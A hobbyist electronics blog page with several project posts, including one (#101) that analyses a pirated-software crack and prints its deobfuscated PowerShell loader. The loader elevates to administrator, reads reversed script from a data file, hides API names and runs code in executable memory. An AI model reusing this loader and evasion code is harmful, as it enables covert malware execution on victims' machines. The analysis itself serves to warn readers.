Electronics, ESP8266, Experimental

ULTRASONIC WATER LEVEL SENSOR

Leave a comment

#106 AJ-SR04M ultrasonic distance sensor for water

looks like a STM8S003F3 MCU, unmarked crystal and unmarked TTL IC
Underside has a 2 pin socket and is quite dirty…

Recently I have had an old mildly annoying problem snowball into a new serious problem…

Every few months the clean water supply from uThukela Water (Pty) Ltd has been switched off for multiple reasons… striking, damaged electric motors due to Eskom, sabotage and other issues to name a few very serious reasons.

So two large 2500L water tanks were installed in series as a backup which worked well for small water issues that would last maybe a week or two.

However recently There has been no water from uThukela for over a month, and this is very serious.

This event triggered me to investigate water related problems and solutions specifically for my use case.

Order of importance:

  1. I need readily available clean drinking water
  2. Store this water for longer (get extra tanks)
  3. Keep water safely in the tank (no contaminates)
  4. Add sensors to monitor (water level sensor in this case)

For this article will be focusing on the 4th order of importance since this is a tutorial website mainly about electronics.

Therefore I will start by saying I searched for a suitable water level sensor and came across the JSN-SR04T and clones.

This sensor looks very promising and easy to use with 6 available sensor modes (adding increased diversity).

N.B the copy does not have 6 extra modes which was disappointing considering their price point…

2.2m wire with the sensor at the end.

The copy has 3 modes and is similar to the JSN-SR04T-2.0

Now my goal is to use the JSN-SR04T with an ESP8266 connected via WiFi to send readings to my server every 30s, this unit will be completely powered by solar.

The ESP8266 will also have a LAN dashboard to view the readings in real time connected to WiFi but with a connection to the internet not needed, just in case the internet goes down I can still read the water level values.

unfortunately finding a commonly available original JSN-SR04T Ultrasonic Distance Sensor has been quite difficult in South Africa.

I have only been able to find the AJ-SR04M (functions like the JSN-SR04T-2.0) which is a clone but works just like the original, however I see the price is equivalent and sometimes even more than the original which is quite strange. An of course the extra modes are missing…

The waterproof sensor
The sensor is epoxied and completely sealed looks easy enough to install

Mode 1: R27 = is open.

The sensor returns an analogue signal. The formula to calculate the distance from the data is:

Test distance = (high time * speed of sound (340M / s)) / 2;

Mode 2: R27 = A 47K resistor is soldered.

Every 100ms serial data will be sent in mm.

Serial baud rate: 9600, n, 8,1.

The frame format is: 0XFF + H_DATA + L_DATA + SUM
1.0XFF: for a frame to start the data, used to judge;
2.H_DATA: the upper 8 bits of the distance data;
3.L_DATA: the lower 8 bits of the distance data;
4.SUM: data and, for the effect of its 0XFF + H_DATA + L_DATA = SUM (only low 8)

Mode 3: R27 = A 120K resistor is soldered.

Good for low power applications.

After the module is powered on, the module enters standby mode.

If the module receives 0X55 it will send data over serial.

Serial baud rate: 9600, n, 8,1.

Datasheet for the stm8s003f3

Electronics, Experimental, Programming

ROBOGUARD INTEGRATION

Leave a comment

#105 Custom integration sensors with custom receiver

V1.0 breadboard prototype with DIY EEPROM module
V1.0 stripboard soldered prototype with USB and Lipo battery
Testing 2x custom sensors (1x ATTINY85 and 1x ATTINY412) with 433 RF modules

Recently I wanted to integrate the RoboGuard system with some custom sensors on my farming property.

This motivated me to study the hardware and RF protocols used by the RoboGuard

I would like to also account for multiple RoboGuard transmitters scattered over the property each RoboGuard device has 2x pir sensors and sends an alarm signal once both are triggered.

They also send a heartbeat ping every 15min.

They have a range of roughly 400m from transmitter RoboGuard to receiver HQ.

Testing EEPROM data storage.

Now the RoboGuard system uses 433.92Mhz to send signals to the HQ however the HQ can only add up to 8 paired RoboGuards.

Once you reach this limit you will need to purchase more RoboGuard units.

For example if you had 12 RoboGuards, 2 HQ units would be required but if you wanted an HQ that can store more than 8 you would be out of luck.

luckily I had made my own custom RoboGuard receiver and was able to add my own DIY sensors to the RoboGuard device ecosystem

The protocol used is 433.92 ASK and each RoboGuard has 3 signals

  • alarm
  • tamper/learn
  • heartbeat ping
Testing penetration behind galvanised shed (using CY33 module)

Now my receiver needs to store the received device learn UID and this is done via EEPROM on my board

Now my custom device receives all signals just like the RoboGuard HQ.

Next is communicating with the TAK Server.

I could swap the 328P for an ESP8266 which allows WiFi connectivity to the internet

This then allows the device to connect wirelessly.

It still receives RF data from the RoboGuards and just ports these signals over the internet

In future I will make a device with an integrated WiFi connection but In this case all I wanted was more zones and an affordable extra device to keep in my laboratory permanently with the capability to receive 433mhz signals walking around the premises. If need be

Overall my unit contains

A speaker
6 push buttons
2000mAH Lipo battery
built in charger
ability to add clients 12 RoboGuards (more depending on EEPROM size)
433 MHz superheterodyne receiver only
logic to handle all these features

Front of the 433 Transmitter
Back of the 433 Transmitter

More info + datasheets and schematics etc. on my GitHub here

Electronics, Experimental, UPS

LINEAR POWER SUPPLY FROM 1993

Leave a comment

#104 Reverse engineering an old linear power supply

Back panel connectors Antronics made by TPW

Recently I came into possession of two working ups devices from 1993. both of them had old capacitors and old 12v7a lead acid batteries inside the devices.

First thing I did was clean the cases and the PCB boards. Once that was done I replaced the old capacitors and the 12v7a batteries, then I tested both devices. both work fine but the design is old and a bit dangerous.

Secondary side
Primary side

So I decided to reverse engineer the circuit in order to better understand the design and to see if I could make any improvements to a design I would like to make.

While reversing the PCB I noticed that the mains earth and the GND of the circuit were connected together. I also notices sone discoloration from what looks like heat between the regulator and the transformer. Also the 330 ohm resistor for the led appeared to be discoloured from what also looks like excessive heat.

Mirrored for reversing
The original schematic I reversed
Schematic after I implemented suggestions

With these issues in mind I also noticed that the heatsink for the LM317T was very small and close to the transformer and the mains 1A fuse was placed after the choke and varistors instead of before them.

In conclusion I decided to choose between a different regulator at a fixed voltage or a chain of 4 LM317Ts providing around 6A of peak current, Since I do not need to adjust my voltage like the original circuit I should be able to get 13.75v by using a fixed 1k and 10k resistor. I also wanted better heat dissipation and Amps so I will definitely install good heatsinks with thermal compound. Depending on the size of the enclosure I get for the project I may add a fan.

The project files and components list etc. can be found on my Github here.

Electronics, Experimental

THE GAP BETWEEN YOU AND MAINS

Leave a comment

#103 Dangerous BK-357 USB charger teardown

Listing on Takealot
Claimed output…

While looking for a new multi port USB charger I came across the Model BK-357 sold on Takealot by OQ Trading. This charger had many positive reviews with a 4.1 star rating at the time of writing this article and for the low price of R149.00 I had to give this device a try.

Caps could potentially be repurposed from e-waste…

Once I received my charger I noticed That the fast charge USB port was working flawlessly but the 3 normal charging USB ports seemed to have current divided between them.

So I decided to open the charger to investigate further. I noticed the bottom part was glued into place and could be pried open carefully with a small screwdriver and spudger.

Primary and secondary sides with a thin line in-between…

Once opened the PCB was in good condition and contains 2 small switching transformers and a nice fusible resistor that also acts as an inrush limiter but that’s where to positives end. The interference capacitor was skimped on also the electrolytic capacitors are all different colours and brands It’s possible that they have been taken off old junk and re-purposed which is okey but they may have a diminished quality which is almost as alarming as the gap between the primary and secondary sides of the transformers. The biggest gap is around 4.8mm which is not to bad but right in the middle the gap closes all the way to 1.3mm!!!

Largest gap is around 4.8mm and the smallest is a whopping 1.3mm!!

This is very dangerous since there is 1.3mm of PCB space between you and mains voltage!!!

I will be posting my findings as a review on Takealot.

When purchasing multiple socketed USB chargers go for the larger more expensive ones.. As you can see in this case the tiny transformers just can’t output enough current on the cheapies.

The article from Europe’s Safety Gate Alerts can be found here. They identified the problems and measured the charger all the way back in December 2021 in Ireland and here in SA we are happily selling these.

I have also included an article from a Russian review back in March 2021. where The charger was also analysed and determined to be a potential hazard the article can be found here.

BK-357-USB-charger.pdfDownload
1x fast charge 3x normal charge with current divided by 3
Electronics, Experimental

MOTOROLA CM140

Leave a comment

#102 Reprogramming an old CM140 radio

Motorola CM140 From 2003.
Testing shows great results.

If you do not have the code plug password or a saved code plug with the radios serial number then this post is for you.

I recently came into possession of 2 Motorola CM140 25W radios. These radios belonged to my grandfathers old security company which is now dissolved, however amongst a lot of the kit I was able to save a few gems.

Upon inspection these radios were in immaculate condition despite there age. I was able to power up both radios only to find that they were programmed to one channel and when I used Commercial Series CPS (customer programming software) I could not read or write to the radio since the code plug was password protected.

Luckily I found a sample code plug for the model of CM140 radio I had. This allowed me to clone and change the password of the radio using the sample code plug now I can read/write to the radio

I have created a step by step document on my GitHub page here.

Schematic For The Programming Cable.
Any 5v TTL Device Can Work.
Experimental, Programming

REVERSING ANB CRACK

Leave a comment

#101 Reverse Engineering A Simple Crack

A lot of times the ordinary everyday person is unable to resist using pirated software. After all it’s free and usually works, there is the chance of contracting a virus or other malware but using reputable “sources” is acceptable because if many comments praise the distributor then obviously the software can be fine right?

Well…. not necessarily… in some cases bots can create comments and high seed counts creating the appearance of a well received product. Also flags as false positives can be used as camouflage, sometimes the crack installs discrete backdoors sometimes following the living of the land principal. Basically using the files and programs already installed out of the box on Windows or Linux. This makes it very difficult to find the malware as no foreign exe or files are used (at least in the initial stage of infection)

Therefore antivirus software can get stuck with behavior analysis and hash scans. Creating large files (hundreds of megabytes) and reversing code, using BOM to obfuscate are a few little tricks that may be caught by themselves but layering all these techniques can make the malware almost undetectable.

So I decided to create an example using a real life application and crack I found for IBM analyst’s notebook which is used by private and government organizations. Opening a broad portal to many computers luckily when I decoded the scripts I did not see anything too suspicious. however after the patch (DTD.dll) is installed I do not know what behavior the application will show.

The application was downloaded via torrent and yes all the files were correct no man in the middle attacks took place.

Three files are present after unzipping IBM i2 Analyst’s Notebook 9.2.3 Multilingual.zip

Luckily windows CMD and Powershell are used to copy the cack.

crack.zip
IBM_I2_ANB_V9.2.3.exe
IBM_I2_CHART_READER_V9.2.3.exe

Initial folder contents.

Inside crack.zip
bin.dat
patch.bat
Readme.txt

Crack folder contents.

Interesting enough Readme.txt only instructs the user to run patch.bat although the file DTD.dll is copied to \Program Files (x86)\Common Files\i2 Shared\i2 Analyst’s Notebook 7\Components\DTD.dll

There’s no mention of the i2 Analyst’s Notebook 7 folder and we are presumably installing version 9.2.3

patch.bat is obfuscated due to some carefully chosen bytes at the very beginning of the file that are able to trick file and other charset detection software.

Obfuscated patch.bat file
Taking a peek inside the obfuscated patch.bat file

As referenced by this

However once we remove the character and save the file we can see that the .bat file calls Powershell and then extracts and reverses a script from the bin.dat file.. then runs the extracted script in the terminal.

After removing the character

This 1st Powershell script checks for admin privilege then reverses and reads another script from bin.dat.

First Powershell script
PowerShell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
function Test-Administrator {  
    $user = [Security.Principal.WindowsIdentity]::GetCurrent();
    (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)  
}
 
if (-not (Test-Administrator)) {
    Start-Process -FilePath 'cmd.exe' -ArgumentList "/c `"$($pwd.path)\patch.bat`"" -Verb 'RunAs' -WindowStyle
'Normal';
    exit(0);
}
 
$pwsh = "$($env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe";
if ([Environment]::Is64BitProcess) {
    $pwsh = "$($env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe";
}
$fs = [IO.File]::OpenRead('bin.dat');
function Write-Line {
    param (
        $b,
        $s
    )
    $fs.Position = $b;
    $arr = [byte[]]::new($s);
    $fs.Read($arr, 0, $s) | Out-Null;
    [array]::Reverse($arr);
    return [Text.Encoding]::UTF8.GetString($arr);
}
 
$p = [Diagnostics.Process]::new();
$p.StartInfo.WindowStyle = 'Hidden';
$p.StartInfo.FileName = $pwsh;
$p.StartInfo.UseShellExecute = $false;
$p.StartInfo.RedirectStandardInput = $true;
$p.StartInfo.RedirectStandardOutput = $true;
$p.Start();
$p.BeginOutputReadLine();
$p.StandardInput.WriteLine((Write-Line 1809605 44));
$p.StandardInput.WriteLine((Write-Line 1811367 43));
$p.StandardInput.WriteLine((Write-Line 1810556 0));
$p.StandardInput.WriteLine((Write-Line 1812164 42));
$p.StandardInput.WriteLine((Write-Line 1810170 90));
$p.StandardInput.WriteLine((Write-Line 1810017 68));
$p.StandardInput.WriteLine((Write-Line 1809965 47));
$p.StandardInput.WriteLine((Write-Line 1811874 105));
$p.StandardInput.WriteLine((Write-Line 1809071 66));
$p.StandardInput.WriteLine((Write-Line 1810385 56));
$p.StandardInput.WriteLine((Write-Line 1811595 42));
$p.StandardInput.WriteLine((Write-Line 1810117 41));
$p.StandardInput.WriteLine((Write-Line 1810956 16));
$p.StandardInput.WriteLine((Write-Line 1810886 5));
$p.StandardInput.WriteLine((Write-Line 1812211 40));
$p.StandardInput.WriteLine((Write-Line 1811694 1));
$p.StandardInput.WriteLine((Write-Line 1810891 65));
$p.StandardInput.WriteLine((Write-Line 1809394 0));
$p.StandardInput.WriteLine((Write-Line 1810710 162));
$p.StandardInput.WriteLine((Write-Line 1811459 69));
$p.StandardInput.WriteLine((Write-Line 1810260 79));
$p.StandardInput.WriteLine((Write-Line 1809056 1));
$p.StandardInput.WriteLine((Write-Line 1811351 0));
$p.StandardInput.WriteLine((Write-Line 1808904 18));
$p.StandardInput.WriteLine((Write-Line 1810158 11));
$p.StandardInput.WriteLine((Write-Line 1809378 16));
$p.StandardInput.WriteLine((Write-Line 1811741 13));
$p.StandardInput.WriteLine((Write-Line 1811351 16));
$p.StandardInput.WriteLine((Write-Line 1812565 16));
$p.StandardInput.WriteLine((Write-Line 1809850 14));
$p.StandardInput.WriteLine((Write-Line 1811528 16));
$p.StandardInput.WriteLine((Write-Line 1812206 5));
$p.StandardInput.WriteLine((Write-Line 1810972 379));
$p.StandardInput.WriteLine((Write-Line 1812000 164));
$p.StandardInput.WriteLine((Write-Line 1812270 132));
$p.StandardInput.WriteLine((Write-Line 1811558 28));
$p.StandardInput.WriteLine((Write-Line 1808922 95));
$p.StandardInput.WriteLine((Write-Line 1809964 1));
$p.StandardInput.WriteLine((Write-Line 1810956 0));
$p.StandardInput.WriteLine((Write-Line 1812251 19));
$p.StandardInput.WriteLine((Write-Line 1811410 11));
$p.StandardInput.WriteLine((Write-Line 1810582 16));
$p.StandardInput.WriteLine((Write-Line 1808672 16));
$p.StandardInput.WriteLine((Write-Line 1811678 16));
$p.StandardInput.WriteLine((Write-Line 1811544 14));
$p.StandardInput.WriteLine((Write-Line 1808709 16));
$p.StandardInput.WriteLine((Write-Line 1812416 16));
$p.StandardInput.WriteLine((Write-Line 1809057 14));
$p.StandardInput.WriteLine((Write-Line 1809362 16));
$p.StandardInput.WriteLine((Write-Line 1811995 5));
$p.StandardInput.WriteLine((Write-Line 1809864 100));
$p.StandardInput.WriteLine((Write-Line 1809173 108));
$p.StandardInput.WriteLine((Write-Line 1809444 69));
$p.StandardInput.WriteLine((Write-Line 1808725 112));
$p.StandardInput.WriteLine((Write-Line 1811700 41));
$p.StandardInput.WriteLine((Write-Line 1810581 1));
$p.StandardInput.WriteLine((Write-Line 1812211 0));
$p.StandardInput.WriteLine((Write-Line 1808696 13));
$p.StandardInput.WriteLine((Write-Line 1812402 14));
$p.StandardInput.WriteLine((Write-Line 1809408 14));
$p.StandardInput.WriteLine((Write-Line 1811651 14));
$p.StandardInput.WriteLine((Write-Line 1810441 14));
$p.StandardInput.WriteLine((Write-Line 1809705 14));
$p.StandardInput.WriteLine((Write-Line 1809394 14));
$p.StandardInput.WriteLine((Write-Line 1810567 14));
$p.StandardInput.WriteLine((Write-Line 1811637 14));
$p.StandardInput.WriteLine((Write-Line 1810872 14));
$p.StandardInput.WriteLine((Write-Line 1809784 14));
$p.StandardInput.WriteLine((Write-Line 1809654 14));
$p.StandardInput.WriteLine((Write-Line 1809513 92));
$p.StandardInput.WriteLine((Write-Line 1809057 0));
$p.StandardInput.WriteLine((Write-Line 1810085 32));
$p.StandardInput.WriteLine((Write-Line 1811421 38));
$p.StandardInput.WriteLine((Write-Line 1810598 42));
$p.StandardInput.WriteLine((Write-Line 1811811 63));
$p.StandardInput.WriteLine((Write-Line 1809281 81));
$p.StandardInput.WriteLine((Write-Line 1808837 67));
$p.StandardInput.WriteLine((Write-Line 1810640 70));
$p.StandardInput.WriteLine((Write-Line 1809137 36));
$p.StandardInput.WriteLine((Write-Line 1811544 0));
$p.StandardInput.WriteLine((Write-Line 1809798 27));
$p.StandardInput.WriteLine((Write-Line 1809825 11));
$p.StandardInput.WriteLine((Write-Line 1809836 14));
$p.StandardInput.WriteLine((Write-Line 1811665 13));
$p.StandardInput.WriteLine((Write-Line 1811798 13));
$p.StandardInput.WriteLine((Write-Line 1811695 5));
$p.StandardInput.WriteLine((Write-Line 1811586 9));
$p.StandardInput.WriteLine((Write-Line 1809719 65));
$p.StandardInput.WriteLine((Write-Line 1811754 44));
$p.StandardInput.WriteLine((Write-Line 1809017 39));
$p.StandardInput.WriteLine((Write-Line 1809668 37));
$p.StandardInput.WriteLine((Write-Line 1809422 22));
$p.StandardInput.WriteLine((Write-Line 1809649 5));
$p.StandardInput.WriteLine((Write-Line 1810556 11));
$p.StandardInput.WriteLine((Write-Line 1810455 101));
$p.StandardInput.WriteLine((Write-Line 1811979 16));
$p.StandardInput.WriteLine((Write-Line 1810012 5));
$p.StandardInput.WriteLine((Write-Line 1810169 1));
$p.StandardInput.WriteLine((Write-Line 1809394 0));
$p.StandardInput.WriteLine((Write-Line 1812432 133));
$p.StandardInput.WriteLine((Write-Line 1808672 0));
$p.StandardInput.WriteLine((Write-Line 1808725 0));
$p.StandardInput.WriteLine((Write-Line 1810339 46));
$p.StandardInput.WriteLine((Write-Line 1808688 8));
$p.StandardInput.WriteLine((Write-Line 1811694 0));
 
$p.StandardInput.WriteLine('');
$p.WaitForExit();
$fs.Dispose();
exit(0);

The 2nd Powershell script checks the install folders and makes use of the windows dialogs then uses virtualalloc to copy DTD.dll from the bin.dat file to the
\Program Files (x86)\Common Files\i2 Shared\i2 Analyst’s Notebook 7\Components\ directory

Second Powershell script
PowerShell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
Add-Type -AssemblyName PresentationFramework
Add-Type -AssemblyName System.Windows.Forms
 
$dat = [IO.File]::ReadAllBytes('bin.dat');
[Environment]::SetEnvironmentVariable('Desktop', [Environment]::GetFolderPath('Desktop'));
$installDir = [Environment]::ExpandEnvironmentVariables('%windir%');
if (-not [IO.Directory]::Exists($installDir)) {
    [Windows.MessageBox]::Show("Couldn't find defualt installation path ($installDir), Please specify.");
    $browser = New-Object System.Windows.Forms.FolderBrowserDialog
    $browser.Description = "Select Installation Folder";
    $browser.ShowNewFolderButton = $false;
    if ($browser.ShowDialog() -ne "OK") {
        exit(0);
    }
    $installDir = $browser.SelectedPath;
}
[Environment]::SetEnvironmentVariable('InstallDir', $installDir);
 
$assemblies = New-Object -TypeName System.Collections.Generic.Dictionary'[string, System.Reflection.Assembly]' -ArgumentList ([StringComparer]::OrdinalIgnoreCase)
foreach ($assembly in ([AppDomain]::CurrentDomain.GetAssemblies())) {
    $assemblies[[System.IO.Path]::GetFileName($assembly.Location)] = $assembly;
}
 
function Get-Ptr {
    param (
        [IntPtr]
        $ptr,
        [type[]]
        $params,
        [type]
        $rettype
    )
    $bu = [AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]::new(('_' + [guid]::NewGuid().ToString())), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(('_' + [guid]::NewGuid().ToString()), $false).DefineType(('_' + [guid]::NewGuid().ToString()), 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
    $bu.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $params).SetImplementationFlags('Runtime, Managed');
    $bu.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $rettype, $params).SetImplementationFlags('Runtime, Managed');
    $del = $bu.CreateType();
    return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $del);
}
 
function Get-Func {
    param (
        [string]
        $module,
        [string]
        $name,
        [type[]]
        $params,
        [type]
        $rettype
    )
    $na = $assemblies['System.dll'].GetType(('Microsoft' + '.Win32.' + 'UnsafeN' + 'ativeMethods'));
    $gp = $na.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));
    $md = $na.GetMethod('GetModuleHandle').Invoke($null, @($module));
    $ptr = $gp.Invoke($null, @(([System.Runtime.InteropServices.HandleRef]::new([object]::new(), $md)), $name));
    return Get-Ptr $ptr $params $rettype;
}
 
$fname = 'V';
$fname += 'i';
$fname += 'r';
$fname += 't';
$fname += 'u';
$fname += 'a';
$fname += 'l';
$fname += 'A';
$fname += 'l';
$fname += 'l';
$fname += 'o';
$fname += 'c';
$func = Get-Func 'Kernel32.dll' $fname @([IntPtr], [IntPtr], [uint32], [uint32]) ([IntPtr]);
 
[Array]::Reverse($dat, 0, 5920);
[Array]::Reverse($dat, 5920, 1792000);
$patch = $func.Invoke(0, 5920, 12288, 64);
[Runtime.InteropServices.Marshal]::Copy($dat, 0, $patch, 5920);
$patchfunc = Get-Ptr $patch @([uint32], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr]);
$patch2 = [Runtime.InteropServices.Marshal]::AllocHGlobal(1792000);
[Runtime.InteropServices.Marshal]::Copy($dat, 5920, $patch2, 1792000);
$patchfunc.Invoke(0, $patch2, 1, 0);
 
function Copy-InstallFile {
    param (
        $path,
        $pos,
        $size
    )
    try {
        $path = [Environment]::ExpandEnvironmentVariables($path);
        [Array]::Reverse($dat, $pos, $size);
        $fs = [IO.File]::Create($path);
        $fs.Write($dat, $pos, $size);
        $fs.Dispose();
    }
    catch {
        [Windows.MessageBox]::Show("Failed write file $path, Make sure Application is not running.");
        exit(0);
    }
}
 
Copy-InstallFile '%SystemDrive%\Program Files (x86)\Common Files\i2 Shared\i2 Analyst's Notebook 7\Components\DTD.dll' 1797920 10752;
 
 
[Windows.MessageBox]::Show("Patch complete!");
exit(0);

Then ends with a messagebox Patch complete!

Opening DTD.dll with dependency viewer shows only 4 functions.

Methods inside of the DTD.dll file

A VirusTotal scan of DTD.dll shows only 3 positives.

Experimental, Programming

UPSILON REMOTE MONITOR

Leave a comment

#100 Monitoring A Line UPS Remotely

Modernizing the old UPSilon 2000 application was a daunting task my first thought was to read the serial output but unfortunately the UPS is listed as a HID device and not a simple COM port. So I went down the rabbit hole of trying to communicate with hid devices which have strict security to combat keyloggers. I tried to use kernel32 and the create file read and write file methods but I got access denied. Looking closer I could read some of the inputs of the ups hid device but it was going to take too long to figure out direct communication to the ups without an SDK or a good example app using USB HID to communicate with a UPS.

Computer Management Hid UPS

Some details of my ups hid were:
VID = 0001 PID = 0000 Path = \?\hid#vid_0001&pid_0000#6&7efa158&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030} SerialNumber = Manufacturer = MEC Product: MEC0003

Communication over USB

So after wasting 2 days I went back to the drawing board this time instead of using Wireshark to catch the USB packets I decided to take a closer look at the upsilon 2000 application. unfortunately the .dll's don’t show any useful functions in dependency viewer so I can’t call C++ functions from them in C#. So next I switched Wireshark to local monitoring and I found some very useful traffic.

tcp.port == 2570 connect as a client and get data
tcp.port == 8652 read the data from the sms server
udp.port == 11541 udp data

Port 8652 allows me to read alerts sent to the SMS server but instead I re-direct them to my C# application.

GET /smssend_hide.cgi?$sms_recptmobile=0123456789&$sms_content=DESKTOP-294DAYV: This is a test message!&$sms_code=1 HTTP/1.1
User-Agent: RUPS2K SMS
Host: 127.0.0.1
Connection: Keep-Alive

Port 2570 allows me to TCP connect as a client with no auth and now I get all the stat report strings every 1 second.

(238.7 238.7 238.7 007 50.1 27.4 --.- 00001000

The UDP port 11541 always receives upsXXXcnt001 for constant monitoring and I haven’t observed any other use besides this.

ups000cnt001 – connected ups
upsdiscnt001 – not connected

The exe files communicating between themselves are
Monw32.exe 11541 udp listner
RupsMon.exe 2570 tcp listner
UPSilon.exe connects as client

So after finding this info I was able to build a C# app that works in conjunction with UPSilon 2000 but the C# app offers more flexibility such as remote messaging via Telegram or forwarding the stats to a webserver for remote viewing.

The application checks the cd key every time it starts it connects to an IP in Taiwan http://upsilon.icv99.net on port 80 however is you go to port 8080 you get a webpage cd key checking form.
http://59.124.238.71:80
http://upsilon.icv99.net:8080/download_sys/
http://upsilon.icv99.net:8080/download_sys/keycheck.php?cdkey_check=testkey

Reporting serial key and NTFS to home via: http://59.124.238.71

The only thing I couldn’t do was send commands directly to the ups because that communication link is done within the upsilon app itself however I am happy with the overall outcome.

Source code of my application can be found on GitHub

Electronics, Experimental

CUSTOM MOSFET PCB

Leave a comment

#99 Custom WiFi Mosfet PCB with battery backup

Version 1.0 of the protoboard not as appetizing as the schematic…
Reverse side with thicker black wires for the MosFets.

Creating a a custom 4ch Mosfet switch PCB with a built in backup 12v battery changeover circuit takes some careful planning. Since I had experience working with mechanical relay versions the task was not too difficult however it did come with a few extra challenges.
Mosfets require more parts to work reliably they also have significantly different ratings when compared to relays. In this case I was using an esp8266 with 3.3v logic. I had to create an amplifying circuit out of two transistors in order to get around 6.6V to allow the Mosfets to turn on completely thus allowing me to utilize their max current ratings.

The beginning of prototyping always looks so clean…
Bread Board prototyping is always a good idea before soldering.

On my 4ch PCB I used 3x IRL520N and 1x IRLZ44N N channel Mosfets. The IRLZ44N is the best rated for logic level and also the most expensive and rare here at least at this time. I also needed a large amount of amps for the LED strips it was going to switch on and off. The other three IRL520N Mosfets will be used with applications using under 5A of current. Technically I could have just used TIP120 NPN transistors but I wanted to keep the entire PCB Mosfet compatible in case I wanted to swap out any chips.

Drawing block diagrams by hand help the though process.
Creating a clean schematic in KiCad makes building the board easy.

For more info on the project check it out on Github

Electronics

COMMON FETS IN SOUTH AFRICA

Leave a comment

#98 Commonly available MOSFETS in South Africa

When looking for affordable and commonly available MOSFETs in SA I came across a few candidates.
Now there are mostly big tradeoffs with N-channel logic level MOSFETs however, I find that most of the time I use them instead of relays for slow switching applications.
Most of my projects have not been using PWM so I have not had any issues using the logic MOSFETs . And I find that I use the N-channel MOSFETs almost all the time.

“real fet” characteristics
“fake fet” characteristics


Finding MOSFETs with decent specs for a decent price was quite tricky but I found a sweet spot with the IRL520N now there’s always the chance of getting fake chips and I might have fallen victim to this but the “fake chip” had specs that were quite close to the “real chip” in a comparison I did between two chips. The fake one also had a slightly larger and glossier form factor.

“real fet” left and the “fake fet” right

These are my top 3 N-channel MOSFETs which are common

  • IRL520N
  • IRLZ44N
  • IRFZ44N

I would like to add some honorable mentions as well. These N-channel MOSFETs are either not common stock with the online stores I use or are way to expensive for a hobbyist however sometimes they are mandatory requirements for specific projects.

  • IRF3710
  • IRF540N
  • IRF3205
Electronics

DSTV CUTS CORNERS

Leave a comment

#96 A mystery chip causing IR remote trouble

Recently I had to update a DSTV system from the old explorer to the new HD decoder + remote.
Unfortunately older remotes don’t work with the new decoders however when you purchase a decoder you get a new remote in package.

Now I had a bad experience with the B8 remote which brought an even worse issue to light.

The decoder was checked by the technician in the shop and all was well however when I setup the decoder at home I noticed the remote was not working and upon inspection I noticed the orange LED was emitting a very weak signal when I pressed the buttons.

B8 remote

I really did not want to go all the way back to the shop so I opened the remote and I noticed that the IR chip had its numbers filed off… so now the remote also had a mystery chip that I couldn’t search for in order to find potential solutions…

Looking at the PCB everything seemed fine.. the traces, solder joints, button pads, and overall condition was good so the culprit had to be the IR mystery chip. This was confirmed once I received a new remote from the shop after explaining to them what the problem was.

Shaved mystery IR chip

I opened the new remote in order to do a simple comparison. Immediately I noticed that the IR chip in the new remote had text I could read. literally everything else was the same. I also noticed the orange LED was now shining brightly when the buttons were pressed. Keep in mind that these remote PCB boards have are exactly the same in version number and part placement. Only the IR IC is different..

Working chip with markings.

So I came to the conclusion that the unmarked mystery chip was the problem. They even went through the hassle of sanding the text off that inferior chip they used. from here on I can only speculate as to why the factory did this. One reason could be to hide the chip from competitors also they could have been using a cheap replacement which obviously failed yet they still went out to the public. There is a lot to speculate and non of it looks good for DSTV and their made in South Africa labelling.. seems they have been up to some shady business. We will see what else comes out in the future but for now that’s all I have to say.

Passionate about technology!

Test